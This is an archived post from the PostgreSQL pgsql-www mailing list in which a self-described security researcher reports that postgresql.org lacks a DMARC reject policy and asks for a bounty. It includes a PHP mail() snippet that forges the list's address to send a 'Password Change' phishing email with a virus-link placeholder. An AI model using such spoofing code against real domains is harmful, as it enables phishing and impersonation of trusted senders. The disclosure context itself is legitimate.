Vulnerability Report (DMARC RECORD) - Mailing list pgsql-www

From arslan.whitehat@inbox.eu
Subject Vulnerability Report (DMARC RECORD)
Date
Msg-id 20210416025730.79E8B1BE0E18@mail.inbox.eu
Whole thread Raw
Responses Re: Vulnerability Report (DMARC RECORD)
List pgsql-www
Hello Team, 
I am a security researcher and I founded this vulnerability in your website.
I just sent a forged email to my email address that appears to originate from  pgsql-www@postgresql.org. I was able to
dothis because of the following DMARC record:
 

DMARC record lookup and validation for: postgresql.org
" DMARC Quarantine/Reject policy not enabled "

How To Reproduce(POC-ATTACHED IMAGE):-
1.Go To- mxtoolbox.com/DMARC.aspx
2.Enter the Website.CLICK GO.
3.You Will See the fault(DMARC Quarantine/Reject policy not enabled)

Fix:
1)Publish DMARC Record.
2)Enable DMARC Quarantine/Reject policy

For more information you can use this blog 
(https://sendgrid.com/blog/what-is-dmarc/).

<?php
$to = "VICTIM@example.com";
$subject = "Password Change";
$txt = "Change your password by visiting here - [VIRUS LINK HERE]l";
$headers = "From:pgsql-www@postgresql.org";
mail($to,$subject,$txt,$headers);

?>

Reference : https://www.knownhost.com/wiki/email/troubleshooting/setting-up_spf-dkim-dmarc_records


Let me know if you need me to send another forged email, or if have any other questions.


Hoping for the bounty for my ethical Disclosure.
Kind Regards
Security Researcher
Attachment

pgsql-www by date:

Previous
From: Magnus Hagander
Date:
Subject: Re: GSoC Proposal on Improve pgeu-system Management for Conference
Next
From: Magnus Hagander
Date:
Subject: Re: Vulnerability Report (DMARC RECORD)